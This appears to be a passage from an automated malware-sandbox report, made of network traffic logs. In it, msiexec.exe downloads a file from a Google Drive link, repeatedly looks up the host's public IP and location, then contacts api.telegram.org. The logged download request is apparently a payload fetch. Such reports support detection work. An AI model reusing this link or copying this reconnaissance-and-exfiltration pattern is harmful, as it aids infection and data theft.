Dec 19, 2024 08:19:48.342521906 CET	49857	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:48.342588902 CET	443	49857	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:48.789901972 CET	443	49857	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:48.789963007 CET	443	49857	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:48.790041924 CET	49857	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:48.790496111 CET	49857	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:48.793911934 CET	49856	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:48.794677019 CET	49863	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:48.913861990 CET	80	49856	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:48.913937092 CET	49856	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:48.914097071 CET	80	49863	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:48.914166927 CET	49863	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:48.914285898 CET	49863	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:49.033708096 CET	80	49863	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:50.119894981 CET	80	49863	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:50.123075008 CET	49869	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:50.123106956 CET	443	49869	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:50.123193026 CET	49869	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:50.123414040 CET	49869	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:50.123424053 CET	443	49869	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:50.172581911 CET	49863	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:51.337810040 CET	443	49869	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:51.339364052 CET	49869	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:51.339401960 CET	443	49869	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:51.783018112 CET	443	49869	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:51.783083916 CET	443	49869	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:51.783209085 CET	49869	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:51.783931971 CET	49869	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:51.787286043 CET	49863	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:51.788291931 CET	49871	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:51.907063961 CET	80	49863	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:51.907192945 CET	49863	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:51.907751083 CET	80	49871	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:51.907824993 CET	49871	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:51.907948017 CET	49871	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:52.027442932 CET	80	49871	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:53.010531902 CET	80	49871	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:53.011677027 CET	49876	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:53.011718035 CET	443	49876	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:53.011795044 CET	49876	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:53.011997938 CET	49876	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:53.012012005 CET	443	49876	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:53.063203096 CET	49871	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:54.221744061 CET	443	49876	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:54.223455906 CET	49876	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:54.223475933 CET	443	49876	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:54.666014910 CET	443	49876	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:54.666075945 CET	443	49876	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:54.666161060 CET	49876	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:54.666908979 CET	49876	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:54.670278072 CET	49871	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:54.671432018 CET	49882	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:54.790242910 CET	80	49871	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:54.790316105 CET	49871	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:54.790859938 CET	80	49882	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:54.790946960 CET	49882	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:54.791032076 CET	49882	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:54.910429955 CET	80	49882	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:55.894915104 CET	80	49882	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:55.896015882 CET	49883	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:55.896075010 CET	443	49883	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:55.896142960 CET	49883	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:55.896375895 CET	49883	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:55.896390915 CET	443	49883	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:55.938324928 CET	49882	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:57.106708050 CET	443	49883	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:57.109006882 CET	49883	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:57.109045982 CET	443	49883	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:57.551170111 CET	443	49883	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:57.551397085 CET	443	49883	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:57.551522017 CET	49883	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:57.552063942 CET	49883	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:57.563256025 CET	49882	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:57.564310074 CET	49889	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:57.683092117 CET	80	49882	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:57.683748960 CET	80	49889	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:57.683816910 CET	49882	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:57.683856010 CET	49889	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:57.684103012 CET	49889	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:57.803812981 CET	80	49889	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:58.781325102 CET	80	49889	193.122.130.0	192.168.2.4
Dec 19, 2024 08:19:58.782336950 CET	49895	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:58.782371998 CET	443	49895	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:58.782450914 CET	49895	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:58.782648087 CET	49895	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:19:58.782660961 CET	443	49895	172.67.177.134	192.168.2.4
Dec 19, 2024 08:19:58.828881979 CET	49889	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:19:59.998548031 CET	443	49895	172.67.177.134	192.168.2.4
Dec 19, 2024 08:20:00.000374079 CET	49895	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:20:00.000402927 CET	443	49895	172.67.177.134	192.168.2.4
Dec 19, 2024 08:20:00.441628933 CET	443	49895	172.67.177.134	192.168.2.4
Dec 19, 2024 08:20:00.441788912 CET	443	49895	172.67.177.134	192.168.2.4
Dec 19, 2024 08:20:00.441889048 CET	49895	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:20:00.442289114 CET	49895	443	192.168.2.4	172.67.177.134
Dec 19, 2024 08:20:00.477492094 CET	49889	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:20:00.597404003 CET	80	49889	193.122.130.0	192.168.2.4
Dec 19, 2024 08:20:00.597476006 CET	49889	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:20:00.628170013 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:00.628194094 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:00.628257036 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:00.628665924 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:00.628679037 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:02.004486084 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:02.004575968 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:02.006083012 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:02.006092072 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:02.006407022 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:02.007663012 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:02.051359892 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:02.501956940 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:02.502041101 CET	443	49897	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:02.502186060 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:02.504287958 CET	49897	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:08.451915979 CET	49845	80	192.168.2.4	193.122.130.0
Dec 19, 2024 08:20:08.653422117 CET	49917	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:08.653481007 CET	443	49917	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:08.653783083 CET	49917	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:08.654035091 CET	49917	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:08.654047012 CET	443	49917	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:10.020932913 CET	443	49917	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:10.063252926 CET	49917	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:12.480679989 CET	49917	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:12.480704069 CET	443	49917	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:12.480771065 CET	49917	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:12.480779886 CET	443	49917	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:13.025593996 CET	443	49917	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:13.025677919 CET	443	49917	149.154.167.220	192.168.2.4
Dec 19, 2024 08:20:13.025993109 CET	49917	443	192.168.2.4	149.154.167.220
Dec 19, 2024 08:20:13.026316881 CET	49917	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 08:19:25.057966948 CET	53037	53	192.168.2.4	1.1.1.1
Dec 19, 2024 08:19:25.197334051 CET	53	53037	1.1.1.1	192.168.2.4
Dec 19, 2024 08:19:27.850670099 CET	52926	53	192.168.2.4	1.1.1.1
Dec 19, 2024 08:19:27.990449905 CET	53	52926	1.1.1.1	192.168.2.4
Dec 19, 2024 08:19:34.050123930 CET	65190	53	192.168.2.4	1.1.1.1
Dec 19, 2024 08:19:34.189230919 CET	53	65190	1.1.1.1	192.168.2.4
Dec 19, 2024 08:19:36.054187059 CET	59284	53	192.168.2.4	1.1.1.1
Dec 19, 2024 08:19:36.195871115 CET	53	59284	1.1.1.1	192.168.2.4
Dec 19, 2024 08:20:00.478123903 CET	54059	53	192.168.2.4	1.1.1.1
Dec 19, 2024 08:20:00.627600908 CET	53	54059	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 08:19:25.057966948 CET	192.168.2.4	1.1.1.1	0x2a21	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:27.850670099 CET	192.168.2.4	1.1.1.1	0xc252	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:34.050123930 CET	192.168.2.4	1.1.1.1	0x43f8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:36.054187059 CET	192.168.2.4	1.1.1.1	0x72d9	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:20:00.478123903 CET	192.168.2.4	1.1.1.1	0x5086	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 08:19:25.197334051 CET	1.1.1.1	192.168.2.4	0x2a21	No error (0)	drive.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:27.990449905 CET	1.1.1.1	192.168.2.4	0xc252	No error (0)	drive.usercontent.google.com		172.217.17.65	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:34.189230919 CET	1.1.1.1	192.168.2.4	0x43f8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 19, 2024 08:19:34.189230919 CET	1.1.1.1	192.168.2.4	0x43f8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:34.189230919 CET	1.1.1.1	192.168.2.4	0x43f8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:34.189230919 CET	1.1.1.1	192.168.2.4	0x43f8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:34.189230919 CET	1.1.1.1	192.168.2.4	0x43f8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:34.189230919 CET	1.1.1.1	192.168.2.4	0x43f8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:36.195871115 CET	1.1.1.1	192.168.2.4	0x72d9	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:19:36.195871115 CET	1.1.1.1	192.168.2.4	0x72d9	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:20:00.627600908 CET	1.1.1.1	192.168.2.4	0x5086	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49820	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:34.319214106 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 08:19:35.413820028 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0771e610c45878a6f7af9dd82fe27180 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 19, 2024 08:19:35.417264938 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 19, 2024 08:19:35.736304045 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c7e288ce6aae2f75b07b105c6c299558 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 19, 2024 08:19:37.904212952 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 19, 2024 08:19:38.225465059 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 726c66aa9c4e104a1cffa39b0d84d85f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49837	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:40.259380102 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 19, 2024 08:19:41.356376886 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e6834989b4bc25b58fb3288d40f6dc46 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49845	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:43.147336006 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 19, 2024 08:19:44.242521048 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 60fbd330aaf4956525b54067038c4a97 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49856	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:46.029876947 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 08:19:47.126243114 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6d78b49d254407a2dad5861948b22415 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49863	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:48.914285898 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 08:19:50.119894981 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e04367701d59a2b2d5db54884d5a6bcf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49871	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:51.907948017 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 08:19:53.010531902 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ece0b22cff4d11cf2db766db6b4f783d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49882	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:54.791032076 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 08:19:55.894915104 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 067a0beb128ee7e4374d6a5dd86b53b3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49889	193.122.130.0	80	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:19:57.684103012 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 19, 2024 08:19:58.781325102 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:19:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f25dc38fced7e14abfd5f1e7c15336e7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49797	216.58.208.238	443	2720	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:19:26 UTC	216	OUT	GET /uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-12-19 07:19:27 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 19 Dec 2024 07:19:27 GMT Location: https://drive.usercontent.google.com/download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-4vpCfDCRJy-Qa7D6TpyU2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com 